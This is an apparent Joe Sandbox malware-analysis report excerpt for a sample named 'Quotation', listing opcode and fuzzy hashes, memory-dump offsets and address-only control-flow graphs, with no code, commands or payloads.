                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 50c28e87e252d1a6c82aa0d9e5134c75e4a7d411feccf682f9fb68b1dcff7f34
                                                    • Instruction ID: 6931ac00503af632be46c104912e856c9adf6bd6c506a0c1d29d980341bc8ccb
                                                    • Opcode Fuzzy Hash: 50c28e87e252d1a6c82aa0d9e5134c75e4a7d411feccf682f9fb68b1dcff7f34
                                                    • Instruction Fuzzy Hash: CE520F34A002188FEF149BE8D864BAEBB73FF98301F1080A9D50A6B795DF355E859F51

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 878 c2e007-c2e012 879 c2e016-c2e022 878->879 880 c2e014 878->880 881 c2e024 879->881 882 c2e029-c2e02a call c2e8e8 879->882 880->879 881->882 883 c2e030-c2e099 882->883 899 c2e0a0-c2e0d1 call c2f71f 883->899 907 c2e0d8 899->907 908 c2e0df 907->908 909 c2e0e6-c2e0ed 908->909 911 c2e0f4-c2e0fb 909->911 913 c2e102 911->913 914 c2e109 913->914 915 c2e110 914->915 916 c2e117-c2e11e 915->916 918 c2e125 916->918 919 c2e12c 918->919 920 c2e133 919->920 921 c2e13a 920->921 922 c2e141 921->922 923 c2e148 922->923 924 c2e14f-c2e156 923->924 926 c2e15d-c2e164 924->926 928 c2e16b 926->928 929 c2e172-c2e179 928->929 931 c2e180 929->931 932 c2e187 931->932 933 c2e18e 932->933 934 c2e195-c2e19c 933->934 936 c2e1a3-c2e1b1 934->936 939 c2e1b8 936->939 940 c2e1bf-c2e1c6 939->940 942 c2e1cd-c2e1d4 940->942 944 c2e1db-c2e1e2 942->944 946 c2e1e9 944->946 947 c2e1f0 946->947 948 c2e1f7 947->948 949 c2e1fe 948->949 950 c2e205 949->950 951 c2e20c-c2e213 950->951 953 c2e21a 951->953 954 c2e221-c2e22f 953->954 957 c2e236-c2e23d 954->957 959 c2e244 957->959 960 c2e24b-c2e252 959->960 962 c2e259 960->962 963 c2e260 962->963 964 c2e267-c2e275 963->964 967 c2e27c-c2e283 964->967 969 c2e28a 967->969 970 c2e291 969->970 971 c2e298-c2e29f 970->971 973 c2e2a6-c2e2ad 971->973 975 c2e2b4-c2e2bb 973->975 977 c2e2c2-c2e2c9 975->977 979 c2e2d0-c2e2d7 977->979 981 c2e2de-c2e2f3 979->981 985 c2e2fa-c2e301 981->985 987 c2e308 985->987 988 c2e30f-c2e316 987->988 990 c2e31d-c2e324 988->990 992 c2e32b-c2e332 990->992 994 c2e339 992->994 995 c2e340 994->995 996 c2e347-c2e34e 995->996 998 c2e355-c2e35c 996->998 1000 c2e363-c2e36a 998->1000 1002 c2e371-c2e378 1000->1002 1004 c2e37f-c2e386 1002->1004 1006 c2e38d 1004->1006 1007 c2e394 1006->1007 1008 c2e39b-c2e3a2 1007->1008 1010 c2e3a9-c2e3b7 1008->1010 1013 c2e3be 1010->1013 1014 c2e3c5-c2e3cc 1013->1014 1016 c2e3d3 1014->1016 1017 c2e3da 1016->1017 1018 c2e3e1 1017->1018 1019 c2e3e8-c2e3f6 1018->1019 1022 c2e3fd-c2e412 1019->1022 1026 c2e419-c2e420 1022->1026 1028 c2e427-c2e4f9 1026->1028 1059 c2e500-c2e507 1028->1059 1061 c2e50e-c2e515 1059->1061 1063 c2e51c 1061->1063 1064 c2e523-c2e538 1063->1064 1068 c2e53f 1064->1068 1069 c2e546-c2e60a 1068->1069 1098 c2e611-c2e626 1069->1098 1102 c2e62d-c2e63b 1098->1102 1105 c2e642 1102->1105 1106 c2e649-c2e6d5 1105->1106 1127 c2e6dc 1106->1127 1128 c2e6e3-c2e71b 1127->1128 1137 c2e722-c2e729 1128->1137 1139 c2e730-c2e73e 1137->1139 1142 c2e745 1139->1142 1143 c2e74c-c2e82c 1142->1143 1176 c2e833 1143->1176 1177 c2e83a-c2e848 1176->1177 1180 c2e84f 1177->1180 1181 c2e856 1180->1181 1182 c2e85d-c2e86b 1181->1182 1185 c2e872-c2e879 1182->1185 1187 c2e880-c2e8aa 1185->1187 1194 c2e8b1-c2e8cd 1187->1194 1199 c2e8d4-c2e8db 1194->1199 1201 c2e8e2-c2e8e5 1199->1201
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4ae43fb46db191f61d222dcd8a3f28a94d6d6470a0dc9c2f7563e594c86f09ae
                                                    • Instruction ID: bdc1d198afdde1ddf9a7165bfdb0a3e75ab15314bbf33fb2e128c6da4d1a9a66
                                                    • Opcode Fuzzy Hash: 4ae43fb46db191f61d222dcd8a3f28a94d6d6470a0dc9c2f7563e594c86f09ae
                                                    • Instruction Fuzzy Hash: D112A835021656DFE340ABB0EAAC36E7B60FB2F7277056C5AF00BC04759F71449ACA66

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1204 c2e018-c2e022 1205 c2e024 1204->1205 1206 c2e029-c2e8db call c2e8e8 call c2f71f 1204->1206 1205->1206 1525 c2e8e2-c2e8e5 1206->1525
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5870a646cf264023ade0768c5f840a21bd02ac324478094dfcfd7f311c24dfc9
                                                    • Instruction ID: cff04abd389d3353a25eaa5570f18d37337bb67d57c64a28ae674dd4c68b8bbc
                                                    • Opcode Fuzzy Hash: 5870a646cf264023ade0768c5f840a21bd02ac324478094dfcfd7f311c24dfc9
                                                    • Instruction Fuzzy Hash: D412A835021646DFA240ABB0EAAC36E7B64FB2F7277056C5AF00BC04759F71449ACA66

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1528 c20c8f-c20c91 1529 c20c96-c20c9a 1528->1529 1530 c20c94 1528->1530 1531 c20c9e-c20cc0 1529->1531 1532 c20c9c 1529->1532 1530->1529 1534 c20cc2 1531->1534 1535 c20cc7-c20cdd call c20780 1531->1535 1532->1531 1534->1535 1538 c20ce2 1535->1538 1539 c20cee-c2104e call c20780 * 13 1538->1539 1613 c21056-c2105f 1539->1613 1729 c21062 call c227f0 1613->1729 1730 c21062 call c22790 1613->1730 1614 c21068-c2107d 1732 c21080 call c23cc0 1614->1732 1733 c21080 call c23cb1 1614->1733 1616 c21086-c2108f 1734 c21092 call c24193 1616->1734 1735 c21092 call c241a0 1616->1735 1617 c21098-c210c2 1620 c210cb-c210ce call c25362 1617->1620 1621 c210d4-c210fe 1620->1621 1624 c21107-c2110a call c2c146 1621->1624 1625 c21110-c2113a 1624->1625 1628 c21143-c21146 call c2c468 1625->1628 1629 c2114c-c21176 1628->1629 1632 c2117f-c21182 call c2c738 1629->1632 1633 c21188-c211b2 1632->1633 1636 c211bb-c211be call c2ca08 1633->1636 1637 c211c4-c211f7 1636->1637 1640 c21203-c21209 call c2ccd8 1637->1640 1641 c2120f-c2124b 1640->1641 1644 c21257-c2125d call c2cfab 1641->1644 1645 c21263-c2129f 1644->1645 1648 c212ab-c212b1 call c2d278 1645->1648 1649 c212b7-c213d2 1648->1649 1662 c213de-c213f0 call c25362 1649->1662 1663 c213f6-c2145c 1662->1663 1668 c21467-c21473 call c2d548 1663->1668 1669 c21479-c21485 1668->1669 1670 c21490-c2149c call c2d548 1669->1670 1671 c214a2-c214ae 1670->1671 1672 c214b9-c214c5 call c2d548 1671->1672 1673 c214cb-c214d7 1672->1673 1674 c214e2-c214ee call c2d548 1673->1674 1675 c214f4-c21500 1674->1675 1676 c2150b-c21517 call c2d548 1675->1676 1677 c2151d-c21529 1676->1677 1678 c21534-c21540 call c2d548 1677->1678 1679 c21546-c21552 1678->1679 1680 c2155d-c21569 call c2d548 1679->1680 1681 c2156f-c2158c 1680->1681 1683 c21597-c215a3 call c2d548 1681->1683 1684 c215a9-c215b5 1683->1684 1685 c215c0-c215cc call c2d548 1684->1685 1686 c215d2-c215de 1685->1686 1687 c215e9-c215f5 call c2d548 1686->1687 1688 c215fb-c21607 1687->1688 1689 c21612-c2161e call c2d548 1688->1689 1690 c21624-c21630 1689->1690 1691 c2163b-c21647 call c2d548 1690->1691 1692 c2164d-c21659 1691->1692 1693 c21664-c21670 call c2d548 1692->1693 1694 c21676-c21682 1693->1694 1695 c2168d-c21699 call c2d548 1694->1695 1696 c2169f-c216ab 1695->1696 1697 c216b6-c216c2 call c2d548 1696->1697 1698 c216c8-c216d4 1697->1698 1699 c216df-c216eb call c2d548 1698->1699 1700 c216f1-c217aa 1699->1700 1729->1614 1730->1614 1732->1616 1733->1616 1734->1617 1735->1617
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7e68a285d4d6bb1345f28e08fa4656598a0d9387060cd8f286cf4607d828a471
                                                    • Instruction ID: b363c4e31575df43de04dc35f09be7cdfd6c79e2061f0244af92456c92bc269e
                                                    • Opcode Fuzzy Hash: 7e68a285d4d6bb1345f28e08fa4656598a0d9387060cd8f286cf4607d828a471
                                                    • Instruction Fuzzy Hash: 9752C774904219DFCB54EF68ED89B9DB7B2FB88701F1046AAD409AB364DB706D85CF80

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1741 c20ca0-c20cc0 1742 c20cc2 1741->1742 1743 c20cc7-c2105f call c20780 * 14 1741->1743 1742->1743 1924 c21062 call c227f0 1743->1924 1925 c21062 call c22790 1743->1925 1822 c21068-c2107d 1927 c21080 call c23cc0 1822->1927 1928 c21080 call c23cb1 1822->1928 1824 c21086-c2108f 1929 c21092 call c24193 1824->1929 1930 c21092 call c241a0 1824->1930 1825 c21098-c216eb call c25362 call c2c146 call c2c468 call c2c738 call c2ca08 call c2ccd8 call c2cfab call c2d278 call c25362 call c2d548 * 16 1908 c216f1-c217aa 1825->1908 1924->1822 1925->1822 1927->1824 1928->1824 1929->1825 1930->1825
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ff7e578dc63e24ae12549cb96cc7b6f52d1a442190130788bfcd3b2f9fcff68c
                                                    • Instruction ID: d413ec34d13a55b98d67dd7e5413ee968a49cffead1a947352539b0c53b073b9
                                                    • Opcode Fuzzy Hash: ff7e578dc63e24ae12549cb96cc7b6f52d1a442190130788bfcd3b2f9fcff68c
                                                    • Instruction Fuzzy Hash: C652B774904219DFCB54EF68ED89B9DB7B2FB88701F1046AAD409AB364DB706D85CF80
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d76e510154dbf3b9734cabfee4a0a39c85d55f0812dcc78448532972a6add465
                                                    • Instruction ID: b1b28ca299f82d7d44dbddbb165466816355c426ee5e13e7924236806feb318a
                                                    • Opcode Fuzzy Hash: d76e510154dbf3b9734cabfee4a0a39c85d55f0812dcc78448532972a6add465
                                                    • Instruction Fuzzy Hash: 2C125A30A04219DFCB15DF69E9C4AAEBBF1FF88310F148699E815AB6A1D730ED41CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29ddbb97523bbf15fa703cde855a74db253e5b157926b18371d8c61c6e2d03b4
                                                    • Instruction ID: d267e07a0ca58032faab475c660b67ad1a889f2b99bc02d0443964425edd7eb7
                                                    • Opcode Fuzzy Hash: 29ddbb97523bbf15fa703cde855a74db253e5b157926b18371d8c61c6e2d03b4
                                                    • Instruction Fuzzy Hash: 59B1DD307042209FDB169B79E858B7E7BA2AF89300F14856AE816CB7A1CF34DD41D7A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71bb8e208981536ae1eaca8eb671dd98b90697ad40cdf2b702ea14648a9ec1f5
                                                    • Instruction ID: 027784d47b4e2a413aa6507fa7e5c36dc46e0cb2453bedca1552a66bad2cc63e
                                                    • Opcode Fuzzy Hash: 71bb8e208981536ae1eaca8eb671dd98b90697ad40cdf2b702ea14648a9ec1f5
                                                    • Instruction Fuzzy Hash: 6E819434A00525CFCB14DF69E488969B7F2BF89314F248169E416E7B65DB31EC41CBB1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d80762e940c997c7909c66697eebd29b5d0bf1885bf5a920f3eedb4a867479d
                                                    • Instruction ID: 4db5f60ba47f2d588815f622ce3a308263fcc3591f410e1aabc34d38d719de8c
                                                    • Opcode Fuzzy Hash: 7d80762e940c997c7909c66697eebd29b5d0bf1885bf5a920f3eedb4a867479d
                                                    • Instruction Fuzzy Hash: B2713631E0432D9FDF249BB8A8507AEBBB2BF85310F1441A6C416B7651DB748E85CB92
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: de094afe39010e00409c828b8aea2a2238e724d9cc4348f8daf46cebdda94057
                                                    • Instruction ID: d66db81b3e25268358fec41ab56d772132e2c1bc931f4b178bd44069f043f25a
                                                    • Opcode Fuzzy Hash: de094afe39010e00409c828b8aea2a2238e724d9cc4348f8daf46cebdda94057
                                                    • Instruction Fuzzy Hash: 58715834301625CFCB14DF69E888A6E7BE6AF99700B1540A9E812CB7B1DF74DD45CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c2acd5e937f22693460b0b72189de3a107e6f9a29da93c92cacba9a75ef53b7
                                                    • Instruction ID: 88a9696d7974beee32b66f749df63a640474ecf96fa5be67133b0beb8ec76010
                                                    • Opcode Fuzzy Hash: 7c2acd5e937f22693460b0b72189de3a107e6f9a29da93c92cacba9a75ef53b7
                                                    • Instruction Fuzzy Hash: 4861C471B002148FCB05DFB8E958BAEBBB2BFC8310B148169E516D77A1CB359D46CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 000cd62aaae84083ab3945e426030c7a6a4311ac7467cb6f9e3e6cac28ba7905
                                                    • Instruction ID: 058124dc0b1c171152bb16131aa13b976db25ee3b873e56f6dae15ac5040f3ed
                                                    • Opcode Fuzzy Hash: 000cd62aaae84083ab3945e426030c7a6a4311ac7467cb6f9e3e6cac28ba7905
                                                    • Instruction Fuzzy Hash: 3F61F274D00318CFEB15DFA9D854BADBBB2FF89304F208529E805AB294DB755986CF40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 99ba9131c4398b3f7f74e248e63a9fdf23860945cebf6f73170e565c1eae3df7
                                                    • Instruction ID: 219d1f7ef1bcc8722546a904b000f5f35c408a2e0fda35f125fbb6711c5aae70
                                                    • Opcode Fuzzy Hash: 99ba9131c4398b3f7f74e248e63a9fdf23860945cebf6f73170e565c1eae3df7
                                                    • Instruction Fuzzy Hash: BF51BF307002249FDB01DF69E884BAEBBE6EF89311F148466E919CB355DB71CD01EBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 861f4e7f8f1d2dc1c7152e43c1e4b97650e9d9927bb82ab8cc2c65b66abb8fef
                                                    • Instruction ID: 1e82032659e624268e79922899599990654e350675dd082009748cf2f5cae5ae
                                                    • Opcode Fuzzy Hash: 861f4e7f8f1d2dc1c7152e43c1e4b97650e9d9927bb82ab8cc2c65b66abb8fef
                                                    • Instruction Fuzzy Hash: 4A51B374E05218DFCB08DFA9E59499DBBF2FF8D310B209469E815AB325DB35A842CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87edcf09f917fe4e548b8c7e1db6777a8bccd8325eb3d28ea2411fe809db1446
                                                    • Instruction ID: f8137f2da732bac88f40c7ffd3421c043a38c9d9b7c35464403b5e5a4d49d390
                                                    • Opcode Fuzzy Hash: 87edcf09f917fe4e548b8c7e1db6777a8bccd8325eb3d28ea2411fe809db1446
                                                    • Instruction Fuzzy Hash: 9151A574E01218DFDB58DFA9D9849DDBBF2BF89300F248169E819AB365DB319905CF10
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 27ad10d8b4942d12ddbc2e12898a475ad73687dae60eb2cad9d8db34bf4fda19
                                                    • Instruction ID: 02d03d1f768e178098221dba49a2f072889d04bdd7b5cacc4fb8ed5ff0a2f0d9
                                                    • Opcode Fuzzy Hash: 27ad10d8b4942d12ddbc2e12898a475ad73687dae60eb2cad9d8db34bf4fda19
                                                    • Instruction Fuzzy Hash: 61519274E01218DFCB08DFA9D59499DBBF6FF8D310B209469E815AB325DB35A842CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7558e5bc514e944f600ade847101c9796e5498b26bca093701741b13d841f28f
                                                    • Instruction ID: 77bf0aac46c3257db95a757d1dcafde552aae7543850cf068865770c99cef6a0
                                                    • Opcode Fuzzy Hash: 7558e5bc514e944f600ade847101c9796e5498b26bca093701741b13d841f28f
                                                    • Instruction Fuzzy Hash: 5741D131A04269DFCF11CFA8E848BADBFB2BF49310F148056E915AB6A1D370ED54CB52
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 669404643eac0eceda24f7e70e487b2bd94284d17e119c4f50743ee44f1f95a5
                                                    • Instruction ID: b5fa34dd129c0986e110ce6132b98a64af1b703e2603c5d6a5c9292a195c579f
                                                    • Opcode Fuzzy Hash: 669404643eac0eceda24f7e70e487b2bd94284d17e119c4f50743ee44f1f95a5
                                                    • Instruction Fuzzy Hash: ED3104317143B48BDF1C46BA789437EAAA6ABC4300F28453ED816D7A90DB79CE458761
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72212b3936ed37ce82ca8fb8c5a2da264ce7e595269979bb716898c61d14bfa9
                                                    • Instruction ID: 7878980b550687b44771be58e29191e3e35e5bb32065eafb1987fddad096a220
                                                    • Opcode Fuzzy Hash: 72212b3936ed37ce82ca8fb8c5a2da264ce7e595269979bb716898c61d14bfa9
                                                    • Instruction Fuzzy Hash: 0631BC31204219EFCF019FA5E948AAF3BB2FB88351F004029F9159B394CB35CE65DBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9d59a17206f4b73ec27e2212f191ac50a4dab9602faf0b51c2c96375737595e5
                                                    • Instruction ID: 96425396e8406fac6ee41d303fc0a66806144457369ee8aedc6b34dc20c0159e
                                                    • Opcode Fuzzy Hash: 9d59a17206f4b73ec27e2212f191ac50a4dab9602faf0b51c2c96375737595e5
                                                    • Instruction Fuzzy Hash: 82216A313052328BDF156776A878B3E3796AFD5708714403AD412CBBA5EE35CC4AE741
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1890d347bdb1531a320bef57d26ec5c406c50339b10141443328158716b69e82
                                                    • Instruction ID: 2bbe35c60f8c8ebdd70e3d31ef4bdbd7935ce0abeb7a287ed924595f8a753996
                                                    • Opcode Fuzzy Hash: 1890d347bdb1531a320bef57d26ec5c406c50339b10141443328158716b69e82
                                                    • Instruction Fuzzy Hash: 70316734D092598FCB05DFB8E8586EDBFF0FF4A300F1001AAC449A7661EB301A45DB62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8c0e16cfbdf106767acb75c89226d28ee47b5eec38327ca50e815f38b545d52
                                                    • Instruction ID: 9e6e85059e58ec062fba937c484b3d4343d05a4c7bca1fa069ca8f5146ce4b13
                                                    • Opcode Fuzzy Hash: d8c0e16cfbdf106767acb75c89226d28ee47b5eec38327ca50e815f38b545d52
                                                    • Instruction Fuzzy Hash: 2E21DA3030122247EF146776A474B7E3297AFC4759F548039D412CBBA4EE75CD4AD741
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 447a0e949a7cbe061dcb917a5cf27df90c2dbb3b607403e5d90db63b334b0647
                                                    • Instruction ID: 927361e0ad1945647d478c47b9c899a39296158aa73e240acd8bd1c2b84fea4a
                                                    • Opcode Fuzzy Hash: 447a0e949a7cbe061dcb917a5cf27df90c2dbb3b607403e5d90db63b334b0647
                                                    • Instruction Fuzzy Hash: 8921C2357056218FCB159B29E868A2EB7A2FFC5751714806AE816DB7B4CF31DC02C7A0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b39211ae618e483761613d0d7fdf1eb3e51d20add6bbe7a2b78118dc545b5263
                                                    • Instruction ID: 92a313e9470ea4be0a1cf0316f14b5ac5e8b11e598060827b462fab81a2f28d1
                                                    • Opcode Fuzzy Hash: b39211ae618e483761613d0d7fdf1eb3e51d20add6bbe7a2b78118dc545b5263
                                                    • Instruction Fuzzy Hash: 64218E75A00115EFDF14EB24D8409AE77A5EBAD360F208419D859DB340DB36EE86CBD1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103618648.0000000000A5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A5D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a5d000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1e64f8ebfa8d9ebec3435f80b09ad26e0fa800aaf6ab3bd45be42027f0597bc
                                                    • Instruction ID: f0d999cecb6bc577f0beb0de8016fde8e31d39e5371f60a55728294d29af5795
                                                    • Opcode Fuzzy Hash: d1e64f8ebfa8d9ebec3435f80b09ad26e0fa800aaf6ab3bd45be42027f0597bc
                                                    • Instruction Fuzzy Hash: 002125B2500304EFDB25DF50D9C0B26BB75FB98319F24C569EC0A0B256C336D85ACAA2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4103660545.0000000000A6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_a6d000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7fadb1691c1496c6458597a6cf1f181940a58de0ebd301348e8e9a8fd516ca64
                                                    • Instruction ID: d520a65ecc5b7cf2d67a89ef15f370ac983a3d5ec005d4a43337ba6110d33aa3
                                                    • Opcode Fuzzy Hash: 7fadb1691c1496c6458597a6cf1f181940a58de0ebd301348e8e9a8fd516ca64
                                                    • Instruction Fuzzy Hash: 4A210771A04304EFDB14DF24D9C0B26BB75FB84754F24C56DE84A4F242C776D846CA62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4104181477.0000000000C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C20000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c20000_Quotation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3eea572bc04792ec2d506125084bfa5ada6ce0240a92cb1e62dc5e998e697a39
                                                    • Instruction ID: d84ec7e4441d110ba72875cad792edf16b4bc8470ad344f10250e34d480f1087
                                                    • Opcode Fuzzy Hash: 3eea572bc04792ec2d506125084bfa5ada6ce0240a92cb1e62dc5e998e697a39
